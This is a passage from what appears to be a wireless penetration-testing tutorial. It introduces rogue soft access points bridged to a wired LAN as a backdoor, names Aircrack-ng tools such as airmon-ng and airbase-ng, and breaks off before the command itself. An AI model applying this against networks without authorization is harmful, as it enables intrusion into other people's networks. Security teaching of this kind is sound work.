Rogue access points
Until now, we have covered unauthenticated attacks against the wireless networks, to crack WEP or WPA keys, attack WPA-Enterprise, recover the WPS PIN, and to gain access to such networks.
In this section, we will cover an attack that assumes the attacker (insider or outsider) to be controlling a machine already connected to the wired LAN: rogue access points.
Indeed, a rogue AP is an access point installed on a LAN without authorization and can be used by an attacker as a backdoor to the network.
A rogue AP can be installed either physically or via software (soft AP). The installation of a physical AP involves breaking the physical security policies of the network and can be identified more easily. We are going to see how to install a rogue soft AP and bridge it to the wired LAN.
We could accomplish this task with hostapd-wpe, but here we use a tool from the Aircrack-ng suite, airbase-ng.
We put our wireless interface in monitor mode with airmon-ng and run the following command...
